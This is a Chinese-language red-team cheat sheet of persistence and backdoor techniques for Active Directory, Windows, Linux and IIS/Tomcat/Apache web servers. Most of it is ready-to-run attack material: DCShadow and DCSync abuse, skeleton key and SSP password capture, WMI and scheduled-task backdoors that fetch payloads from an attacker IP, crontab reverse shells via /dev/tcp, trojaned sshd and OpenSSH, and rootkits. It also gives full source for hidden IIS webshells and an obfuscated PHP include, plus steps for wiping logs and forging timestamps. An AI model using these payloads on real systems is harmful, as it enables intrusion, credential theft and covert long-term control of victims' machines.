>psexec.exe -accepteula -s -i -d cmd.exe
域控制器执行
PS>Add-RemoteRegBackdoor -ComputerName 域控名 -Trustee 'S-1-1-0' –Verbose
域内机器执行
https://raw.githubusercontent.com/HarmJ0y/DAMP/master/RemoteHashRetrieval.ps1
PS> Get-RemoteLocalAccountHash -ComputerName 域控 –Verbose
域控上执行
>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2
PTH攻击,mimikatz需以管理员身份启动
>mimikatz "privilege::debug" "sekurlsa::pth /domain:dc /user:Administrator /ntlm:9f1770aebd442b6b624bdfe9cbc720dd" exit
http://192.168.0.107/ps/nishang/ActiveDirectory/Set-DCShadowPermissions.ps1
DCShadow攻击是通过更改AD架构,使域内一台机器伪造成域控。
此脚本可以通过修改AD对象提供DCShadow攻击的最小权限。
运行此脚本需要DA(Domain Administrator)权限,可以使指定用户不需要DA权限使用mimikatz。
域控:dc.zone.com
域内机器:sub2k8.zone.com
域内普通用户:y
域控执行
>Set-DCShadowPermissions -Fakedc sub2k8 -Object dc -username y –Verbose
注册sub2k8为假DC,给予用户y从sub2k8修改dc的计算机对象的权限。
在sub2k8上,以本地system权限启动一个mimikatz会话,以zone\y权限启动一个mimikatz会话。
System权限窗口执行dcshadow攻击,修改dc的计算机属性
Zone\y权限窗口用于推送
添加域管理
通过修改安全标识符,将域内普通用户y提升为域管理用户
>lsadump::dcshadow /object:y /attribute:primaryGroupID /value:512
Zone\y推送
>lsadump::dcshadow /push
此时在域控上查询可见y用户已经加入域管理组。
添加SIDHistory后门
记录域管理SID
>Set-DCShadowPermissions -FakeDC sub2k8 -Object y -Username y -Verbose
>lsadump::dcshadow /object:y /attribute:sidhistory /value:S-1-5-21-2346829310-1781191092-2540298887-500
推送
>lsadump::dcshadow /push
测试
域控中通过mimikatz命令可查询到SIDHistory
删除SIDHistory的方法
PS>Get-ADUser -Filter {name -eq "y"} –Properties sidhistory|foreach {Set-ADuser $_ –remove @{sidhistory="S-1-5-21-2346829310-1781191092-2540298887-500"}}
删除功能规则
输入的规则后面加参数-remove即可。
服务器管理器找到域->查看->启用高级功能->右键属性->安全->everyone完全控制
>mimikatz.exe "lsadump::dcsync /domain:zone.com /user:administrator" exit
或使用powerview添加一条ACL(域控执行)
>Add-DomainObjectAcl -TargetIdentity "DC=ZONE,DC=COM" -PrincipalIdentity 域内用户 -Rights DCSync -Verbose
使用此账户在域内任意主机可使用mimikatz的dcsync功能导出凭据
移除ACL
>Remove-DomainObjectAcl -TargetIdentity "DC=zone,DC=com" -PrincipalIdentity 用户 -Rights DCSync -Verbose
Netsh Helper DLL
https://github.com/outflanknl/NetshHelperBeacon
https://github.com/rtcrowley/Offensive-Netsh-Helper
生成DLL格式木马
传至靶机执行命令
>netsh add helper C:\Windows\Temp\help.dll
关闭netsh后权限不会掉,因为实际调用的是powershell
#use exploit/multi/script/web_delivery
>set target 2 #PSH
>set payload windows/x64/meterpreter/reverse_tcp
>set lhost 192.168.0.107
>set lport 12345
Visual Studio新建空白DLL项目,源文件添加现有文件
https://github.com/rtcrowley/Offensive-Netsh-Helper/blob/master/netshlep.cpp
复制生成的代码进文件中,在配置管理器中新建x64平台,配置类型选择为动态库后生成解决方案,复制DLL到靶机执行
>netsh add helper helper.dll
关闭netsh后权限会掉
https://github.com/outflanknl/NetshHelperBeacon
MSFvenom生成.c格式
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f c -o /var/www/html/1.c
Visual Studio打开项目
若系统是64位需设置配置管理器为64位项目,反之32(解决方案右键属性)
将MSF生成shellcode粘贴进相应位置后生成解决方案。
会在项目目录x64/Release下生成dll
复制DLL到靶机system32目录下,执行命令
>netsh add helper C:\Windows\System32\NetshHelperBeacon.dll
只要启动netsh就会触发
注册表自启动
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegRun -Verbose -Name Update -Command 'c:\windows\temp\Update.exe' -Instance "zone.com\sub2k8""
重启MSSQL上线(需重启服务)
http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1
>powershell -ep bypass
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1')
>Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "zone.com\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')" 远程木马脚本可用CS/Empire生成
>net stop mssqlserver
>net start mssqlserver
映像劫持
>powershell -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/PowerUpSQL.ps1');Get-SQLPersistRegDebugger -Verbose -FileName sethc.exe -Command "c:\windows\system32\cmd.exe" -Instance "zone.com\sub2k8""
DDL事件触发
>powershell -exec bypass
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/PowerUpSQL/Invoke-SqlServer-Persist-TriggerDDL.psm1')
>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance "zone\sub2k8" -PsCommand "IEX(new-object net.webclient).downloadstring('http://192.168.0.107/xxxx')" 远程木马文件可用CS/Empire生成
>Invoke-SqlServer-Persist-TriggerDDL -Verbose -SqlServerInstance " zone\sub2k8" -Remove 移除后门
http://www.nssm.cc/release/nssm-2.24.zip
NSSM封装可执行程序为系统服务
>nssm install 服务名称会自动弹出设置
Path选择powershell的路径,arguments直接输入参数。
启动服务
>nssm start 服务名称
会上线
重启电脑,权限也会维持
删除服务
>nssm remove <servicename>
https://github.com/secretsquirrel/SigThief
>python sigthief.py -i 被窃取的文件 -t 要添加签名的恶意文件 -o 保存文件
>python sigthief.py -i rarext.dll -t rarextdwa.dll -o 1.dll
Meterpreter> run metsvc -A
在C:\Windows\TEMP下随机生成目录及三个文件,创建服务metsvc,监听31337端口
连接后门
Msf>use exploit/multi/handler
Msf>set payload windows/metsvc_bind_tcp
Msf>set rhost 192.168.1.2
Msf>set rport 31337
Msf>run
删除服务
Meterpreter > run metsvc –r
Meterpreter>run persistence -X -i 10 -r 192.168.1.9 -p 4444
-X系统启动时运行
-i每隔10秒尝试连接服务端
连接后门
Msf>use exploit/multi/handler
Msf>set payload windows/meterpreter/reverse_tcp
Msf>set lhost 192.168.1.1
Msf>set lport 4444
Msf>run
使用VS2015开发环境,MFC设置为在静态库中使用MFC
编译工程,生成HookPasswordChange.dll
https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1
在代码尾部添加如下代码:
>Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
并命名为HookPasswordChangeNotify.ps1
上传HookPasswordChangeNotify.ps1和HookPasswordChange.dll
管理员权限执行
>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1
C:\Windows\Temp下可以找到passwords.txt
&
https://gitee.com/RichChigga/PasswordchangeNotify
上传HookPasswordChangeNotify.ps1和HookPasswordChange.dll 管理员权限执行:
>PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1
在C:\Windows\System32 新建文件system.ini第一行是连接的ip 第二行是端口
https://github.com/3gstudent/PasswordFilter
visualstudio生成解决方案
DLL放在%windir%\system32\下
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa下的Notification Packages,添加Win32Project3
>REG QUERY "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages"
>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0rassfm\0Win32Project3" /f
重启之后只要修改用户的密码,即可记录
文件默认在C盘根目录,可在源码中修改
每隔30秒加载一次payload
>wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
>wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23",CommandLineTemplate="远程调用(powershell,regsvr32,mshta等)"
>wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
重启维持
卸载后门
>Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
>Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
>Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
https://gitee.com/RichChigga/WMI-Persistence
cobalt strike ->payload generator->powershell(use x64)
attack->文件下载,文件选择payload generator的脚本,local uri为随意文件
生成后地址替换进WMI-Persistence脚本内
# powershell -exec bypass
PS > Import-Module .\WMI-Persistence.ps1
PS > Install-Persistence
PS > Check-WMI 重启后即可上线system权限(要等待4-6分钟)
自定义上线
attack->文件下载,exe木马指定为文件。local uri为随意文件,wmi.xsl放在web目录
修改wmi.xsl
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c certutil -urlcache -split -f http://192.168.0.107/load.jpg %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://192.168.0.107/load.jpg delete",0);
]]> </ms:script>
</stylesheet>
WMI-Persistence脚本修改payload地址为wmi.xsl
$finalPayload=" wmic os get /FORMAT:`"$Payload`""
>powershell -exec bypass
PS > Import-Module .\WMI-Persistence.ps1
PS > Install-Persistence
PS > Check-WMI
PS > Remove-Persistence 删除模块
重启后即可上线
>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method nccat -ip 192.168.0.103 -port 9999 -time 2"
> powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method msf -ip 192.168.0.103 -port 8081 -time 2"
使用ADS创建一个隐藏文件,创建一个计划任务每隔一分钟请求一次攻击。
>powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Backdoors/Invoke-ADSBackdoor.ps1'); Invoke-ADSBackdoor -PayloadURL http://192.168.0.107/ps/Schtasks-Backdoor.ps1 -Arguments 'Invoke-Tasksbackdoor -method nccat -ip 192.168.0.107 -port 12138 -time 1'"
生成 >msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.107 LPORT=12138 -f powershell -o /var/www/html/ads #use exploit/multi/handler #set payload windows/x64/meterpreter/reverse_https #run
指定宿主文件,index.php是网页正常文件
>echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
<?php include(‘index.php:hidden.jpg’)?>
<?php
# Hex-encoded "index.php:hidden.jpg" -- the alternate-data-stream path from the echo command above -- split
# into two literals so the path never appears in the file as-is. PACK('H*', ...) decodes it at run time and
# $$b (variable variable, resolves to $a) supplies the string, so the include target is hidden from a plain
# text search of the file.
$a="696E6465782E7068703"."A68696464656E2E6A7067";# hex encoded
$b="a";
include(PACK('H*',$$b))
?>
>echo 9527 > 1.txt:flag.txt
>notepad 1.txt:flag.txt
或不指定宿主文件
>echo hide > :key.txt
>cd ../
>notepad test:key.txt
上传处绕过
上传的文件名 | 服务器表面现象 | 生成的文件内容 |
---|---|---|
test.php:a.jpg | 生成test.php | 空 |
test.php::$DATA | 生成test.php | |
test.php::$INDEX_ALLOCATION | 生成test.php文件夹 | \ |
test.php::$DATA\0.jpg | 生成0.jpg |
创建一个txt文件,test.txt,随便添加内容(实际的工具,即用户要用的那个工具)。
将程序写入文件流(此处用calc.exe)
>type calc.exe > test.txt:calc.exe
使用mklink创建文件链接:
>mklink config.txt test.txt:calc.exe
创建readme.txt,文件内容随便。设置为隐藏。
创建readme.js,内容如下:
// Decoy launcher: the first ShellExecute runs "cmd.exe /c config.txt" with window style 0 (hidden);
// config.txt is the mklink created above that points at the calc.exe stored in test.txt's alternate data
// stream. The second call opens README.txt with window style 1 (normal), so the user only sees the text file.
var objShell = new ActiveXObject("shell.application");
objShell.ShellExecute("cmd.exe", "/c config.txt", "", "open", 0);
objShell.ShellExecute("README.txt", "", "", "open", 1);
执行readme.js,运行calc.exe ,打开readme.txt
Empire
Empire> set Host http://192.168.1.150
Empire> set Port 8080
>launcher powershell Listener's Name
生成后只使用Base64的代码。
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -EncScript Base64编码"
清除后门
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -CleanUp"
Empire>powershell/persistence/elevated/wmi
需高权限
重启失效
>privilege::debug
>misc::memssp
锁屏
>rundll32.exe user32.dll,LockWorkStation
登录的账号密码保存在
C:\Windows\System32\mimilsa.log
重启有效
将mimikatz中的mimilib.dll放入system32目录
>reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" 查看注册表
>reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ 添加mimilib
有账号登录密码保存在C:\Windows\System32\kiwissp.log重启也有效
复制mimilib.dll到system32文件夹中
>shell copy mimilib.dll C:\Windows\System32\
使用模块
>usemodule persistence/misc/install_ssp*
>set Path C:\Users\Administrator\mimilib.dll
>Import-Module .\PowerSploit.psm1
>Install-SSP -Path .\mimilib.dll
域的组策略和脚本存放在域控机的C:\Windows\SYSVOL\sysvol\zone.com\Policies目录,域内机器定时访问以更新策略
域控机设置policies为everyone完全控制
>cacls C:\Windows\SYSVOL\sysvol\zone.com\Policies /e /t /c /g "EveryOne":f
使用powerview查询域内机对应策略文件
PS> Get-NETGPO -ComputerName sub2k8.zone.com |fl gpcfilesyspath
打开C:\Windows\SYSVOL\sysvol\zone.com\Policies\{id}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf末尾添加
[Registry Values] MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger=1,c:\windows\system32\calc.exe [Version] signature="$CHICAGO$" Revision=1
手动刷新策略
>gpupdate /force
劫持taskhost.exe,可替换c:\windows\system32\calc.exe为后门文件或语句。
当有setspn权限时,为域用户添加一个SPN
>setspn -U -A RDP/zone.com godadmin
域内任何主机可以使用Kerberoast 获得TGS
https://github.com/malachitheninja/Invoke-Kerberoast
>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation |Out-File xx.txt
或使用rubeus.exe
破解
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt
域控执行,寻找具备SPN且密码永不过期的账户
>Get-ADUser -Filter * -Properties ServicePrincipalName,PasswordNeverExpires| ? {($_.ServicePrincipalName -ne "") -and ($_.PasswordNeverExpires -eq $true)}
使用mimikatz的dcsync提取用户hash
>lsadump::dcsync /domain:zone.com /user:y
布置后门
>Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount 账户
布置完成后利用,登录账户y
触发后门
>Rubeus.exe s4u /user:y /aes256:{aes256} /domain:zone.com /msdsspn:krbtgt /impersonateuser:godadmin
注入票据,获取域控的CIFS、LDAP服务
>Rubeus.exe asktgs /ticket:{} /service:cifs/dc.zone.com,ldap/dc.zone.com /ptt
http://192.168.0.107/ps/nishang/ActiveDirectory/Add-ConstrainedDelegationBackdoor.ps1
新增一个受限委派服务账户,或添加受限委派后门功能给一个已知账户密码存在的服务账户。
需运行在域控制器上,本次演示的是新建后门账户,若是给已知账户密码的服务账户添加功能,步骤一致。
PS > Add-ConstrainedDelegationBackdoor -SamAccountName backdoor -Domain zone.com -AllowedToDelegateTo ldap/dc.zone.com
密码默认为Password@123!,可修改脚本中的$Password参数来更改密码。
https://github.com/samratashok/ADModule
导入ADModule中的Microsoft.ActiveDirectory.Management.dll和Import-ActiveDirectory.ps1
>Import-Module Microsoft.ActiveDirectory.Management.dll -Verbose
>Import-Module Import-ActiveDirectory.ps1
现以域内普通用户y登录一台域内机器sub2k8,使用kekeo获取TGT
Kekeo#tgt::ask /user:backdoor /domain:zone.com /password:Passowrd@123!
Kekeo#tgs::s4u /tgt:TGT_backdoor@ZONE.COM_krbtgt~zone.com@ZONE.COM.kirbi /user:godadmin@zone.com /service:ldap/dc.zone.com获取以域管理身份访问ldap的TGS
使用mimikatz写入TGS票据
mimikatz#kerberos::ptt C:\Users\y.ZONE\Desktop\kekeo\x64\TGS_godadmin@zone.com@ZONE.COM_ldap~dc.zone.com@ZONE.COM.kirbi
接下来就可以dcsync导出krbtgt的hash,通过krbtgt伪造黄金票据
mimikatz#lsadump::dcsync /user:krbtgt /domain:zone.com
域控上使用mimikatz执行
>privilege::debug
>misc::skeleton
可以使用域内任何账号以密码mimikatz登录任意域内主机
使用Empire模块
>usemodule persistence/misc/skeleton_key*
绕过LSA Protection
>privilege::debug
>!+
>!processprotect /process:lsass.exe /remove
>misc::skeleton
>msfvenom -p windows/shell_hidden_bind_tcp LPORT=443 AHOST=192.168.0.107 -f exe > svchost.exe
只有当107这台机器连接时可获得shell,其他机器不可以。
>msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.107 LPORT=12138 -f raw > /var/www/html/shell.sh
(crontab -l;printf "*/1 * * * * /bin/bash /tmp/shell.sh;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
#!bash
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
安装strace
#apt-get install strace
#vi ~/.bashrc
添加
alias ssh='strace -o /tmp/.log -e read,write,connect -s 2048 ssh'
>ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
执行后开启31337端口,使用root任意密码登录
>ssh root@192.168.1.1 -p 31337
http://cymothoa.sourceforge.net/
靶机>./cymothoa -p 进程PID -s 1 -y 端口
攻击机>nc -vv ip 端口
#cd /usr/sbin
#mv sshd ../bin
#echo '#!/usr/bin/perl' >sshd
#echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
#echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
#chmod u+x sshd
#/etc/init.d/sshd restart
攻击机执行
>socat STDIO TCP4:192.168.0.110:22,sourceport=13377
>cp /bin/bash /tmp/tmp
>chmod u+s /tmp/tmp
>/tmp/tmp -p
>vim /etc/ssh/sshd_conf取消以下注释
>ssh-keygen生成
复制/root/.ssh/id_rsa.pub文件到攻击端的/root/.ssh/authorized_keys
>ssh -i id_rsa targer@1.1.1.1
https://github.com/f0rb1dd3n/Reptile
安装
>apt install build-essential libncurses-dev linux-headers-$(uname -r)
>git clone https://github.com/f0rb1dd3n/Reptile.git
http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
version - 0 : 2.6.18 (RHEL/CentOS 5.x)
1 : 2.6.32 (Ubuntu 10.x) [default version]
修改配置config.h
安装路径、日志路径、端口、连接密码、连接用户
./setup build
攻击机连接
>telnet 192.168.1.1 13377
下载
http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
备份配置文件
>mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
>mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
安装关联文件
centos
>yum install -y openssl openssl-devel pam-devel zlib zlib-devel
Ubuntu
>apt-get install -y openssl libssl-dev libpam0g-dev
>tar zxvf openssh-5.9p1.tar.gz
>tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
>cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
>cd openssh-5.9p1
>patch <sshbd5.9p1.diff
>vim includes.h
/tmp/ilog记录登录到本机的用户密码
/tmp/olog记录本机登录其他机器的账户密码
日志文件前可以加个.隐藏起来
SECRETPW是连接后门密码
查看当前版本
>ssh -V
修改version.h改为当前版本
编译安装
Centos7
>./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
>make clean
>make && make install
>systemctl restart sshd.service
ubuntu
>./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam
>make clean
>make&&make install
重启服务后,将配置文件的时间戳改回备份文件的时间
>touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config
>touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config
清除痕迹
>export HISTFILE=/dev/null
>export HISTSIZE=0
>export HISTFILESIZE=0
>sed -i 's/192.168.0.1/127.0.0.1/g' /root/.bash_history
>iptables -t nat -N LETMEIN
>iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22
# 开启开关
>iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT
# 关闭开关
>iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT
>iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
攻击端:
#开启复用
>echo threathuntercoming | socat - tcp:192.168.0.110:80
#ssh使用80端口进行登录
ssh -p 80 root@192.168.0.110
#关闭复用
echo threathunterleaving | socat - tcp:192.168.0.110:80
>chattr +I shell.sh
>vim .shell.sh
>attrib +s +h +r 1.txt
>touch -r 1.file 2.file 修改2file文件的时间跟1file时间相同
From:https://github.com/WBGlIl/IIS_backdoor
IIS_backdoor_dll.dll放入 web 目录的 bin 文件夹中,配置 web.config 文件
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<modules>
<add name="IIS_backdoor" type="IIS_backdoor_dll.IISModule" />
</modules>
</system.webServer>
</configuration>
IIS_backdoor_shell.exe执行命令
使用IISBackdoor太明显,容易被看出是后门,这里对后门改名
重新生成解决方案,dll放入bin目录,web.config修改为
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<modules>
<add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" />
</modules>
</system.webServer>
</configuration>
添加完之后会自动在模块中注册好
执行payload,msf生成raw格式payload,选择shellcode选项,raw文件拖入即可
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.raw
From:https://github.com/Ivan1ee/NetDLLSpy
原作者提及三种方式,第一种编译代码为DLL新建aspx文件实例化后门类来执行命令,第二种是做httphandler映射可指定一个后缀执行命令保存文件在web服务器上,再读取结果。第三种是使用jsc.exe编译js脚本生成dll,添加映射菜刀连接。
这里根据原作者的代码,进行了一下简单的修改,修改后的功能为添加httphandler映射指定一个后缀执行命令显示在页面上,不用保存在服务器中再访问。
代码
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Web;
namespace IsapiModules
{
    /// <summary>
    /// IHttpHandler that turns a form POST into a cmd.exe invocation. It is wired to a file extension by
    /// the web.config <handlers> entry shown after the listing, so any request for that extension reaches it.
    /// Defender note: review web.config handler/module entries and the DLLs in bin for names that do not
    /// correspond to a deployed application component; the handler itself leaves no file on disk per request.
    /// </summary>
    public class Handler : IHttpHandler
    {
        /// <summary>False: ASP.NET creates a new Handler instance per request (IHttpHandler contract).</summary>
        public bool IsReusable
        {
            get
            {
                return false;
            }
        }
        /// <summary>
        /// Reads the command from the "InternetInformationService" form field and runs it only when the
        /// "microsoft" form field equals "iis"; any other request is served nothing and returns normally.
        /// </summary>
        /// <param name="context">Current request context; only Request.Form is consulted.</param>
        public void ProcessRequest(HttpContext context)
        {
            string input = context.Request.Form["InternetInformationService"]; //command
            if (context.Request.Form["microsoft"] == "iis")//do command
            {
                this.cmdShell(input);
            }
        }
        /// <summary>
        /// Runs <paramref name="input"/> through "cmd.exe /c", reads stdout to end and writes it to the
        /// current response. Stdout is redirected with UseShellExecute=false and a hidden window; stderr
        /// is not captured, and there is no WaitForExit, so ReadToEnd returning is what ends the call.
        /// </summary>
        /// <param name="input">Command line appended verbatim after "/c".</param>
        public void cmdShell(string input)
        {
            Process process = new Process();
            process.StartInfo.FileName = "cmd.exe";
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.UseShellExecute = false;
            process.StartInfo.Arguments = "/c " + input;
            process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            process.Start();
            StreamReader output = process.StandardOutput;
            String result = output.ReadToEnd();
            output.Close();
            output.Dispose();
            // Written to HttpContext.Current rather than a passed-in context; same request here.
            HttpContext.Current.Response.Write(result);
        }
    }
}
保存为随意后缀,使用csc编译。
>C:\Windows\Microsoft.NET\Framework\v2.50727\csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\SystemIO.dll C:\inetpub\wwwroot\bin\code.cs
Web.config文件添加
<system.webServer>
<handlers>
<add name="PageHandlerFactory-ISAPI-2.0-32" path="*.xxx" verb="*" type="IsapiModules.Handler" resourceType="Unspecified" requireAccess="Script" preCondition="integratedMode" />
</handlers>
</system.webServer>
打开IIS管理器,可以看到处理映射管理器中已经添加了模块。
现在随意访问个xxx后缀的文件
带参数访问
microsoft=iis&InternetInformationService=net user
第三种连接菜刀,这里也对代码修改了一下。
import System;
import System.Web;
import System.IO;
package IsapiModule
{
    // JScript.NET HTTP handler: every request mapped to it (the "*.iis" handler entry in web.config below)
    // gets "404 Not Found" as the response body and then has its "Internet" parameter evaluated as code.
    // Defender note: the fake 404 means the page looks absent to a crawler or log review; the handler
    // mapping in web.config and the DLL in bin are where it shows up.
    public class Handler implements IHttpHandler
    {
        function IHttpHandler.ProcessRequest(context : HttpContext)
        {
            // Body written first, presumably so the response reads like a miss whatever the eval does.
            context.Response.Write("404 Not Found")
            // Short aliases so the eval'd script can reach the request, response and server objects.
            var I = context;
            var Request = I.Request;
            var Response = I.Response;
            var Server = I.Server;
            // "Internet" is the request parameter (query or form) whose value is run verbatim as JScript.
            eval(context.Request["Internet"]); // parameter name the client must use
        }
        // True: one instance is reused across requests (IHttpHandler contract).
        function get IHttpHandler.IsReusable() : Boolean{ return true}
    }
}
使用jsc编译
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe /t:library -out:C:\inetpub\wwwroot\Bin\IsapiModule.Handler.dll C:\inetpub\wwwroot\bin\code.js
编辑web.config,添加映射,这里指定的后缀是.iis
<system.webServer>
<modules runAllManagedModulesForAllRequests="true"/> <directoryBrowse enabled="true"/>
<staticContent>
<mimeMap fileExtension=".json" mimeType="application/json" />
</staticContent>
<handlers>
<add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*" type="IsapiModule.Handler" preCondition="integratedMode"/>
</handlers>
</system.webServer>
已自动加入了映射。现在随便访问个iis后缀的文件。
可使用菜刀直接连接
From:https://github.com/0x09AL/IIS-Raid
在vs2019下编译
在Functions.h中修改连接密码,passfile是dump下来的密码保存的位置,com_header是后门和服务器通信的请求头。
打开项目修改完你的密码,直接ctrl+B生成解决方案即可(这里生成的是release版本)
Dll传到服务器,改个名字,执行添加模块
>C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:IsapiDotNet /image:"c:\windows\system32\inetsrv\IsapiDotNet.dll" /add:true
在模块中可以看到已经存在了
远程连接
>python3 iis_controller.py --url http://192.168.0.98 --password thisismykey
执行命令的方式是
>cmd +命令
Dump命令可以dump下来IIS站点的登录的信息,保存在设置的位置。
Inject可以执行shellcode
Cs/msf生成raw格式的shellcode
>inject 位置
From:https://www.freebuf.com/articles/web/172753.html
https://github.com/rebeyond/memShell
当获取一个webshell或bashshell权限时,下载后门执行注入进程形成无文件复活后门
下载后解压到任意web目录
得到2个jar文件
执行,password设置为你的密码
>java -jar inject.jar password
注入成功,在web任意页面任意url执行命令
http://192.168.0.121:8080/css/app.css?pass_the_world=password
可执行命令,反弹shell,上传/下载文件,列目录,读文件,添加代理,连接菜刀
From:https://mp.weixin.qq.com/s/7b3Fyu_K6ZRgKlp6RkdYoA
https://github.com/QAX-A-Team/HideShell
把自己的shell和hideshell传入靶机,先访问自己的shell,目的是为了让 Tomcat 将它编译,并生成 JspServletWrapper 保存在 JspRuntimeContext 中。
再访问hideshell.jsp,点击hide你的shell。
已经隐藏了
再访问hideshell.jsp,可以看到隐藏后的shell的文件名。
访问看看
当然,也可以把hideshell自身隐藏了,那访问它的方式就是hidden-hideshell.jsp
目录里啥都没了
此方式隐藏之后请求不会产生日志
那如果把shelltest文件夹删掉权限还会在吗?
是在的
From:https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor
生成模板结构
>apxs -g -n auth
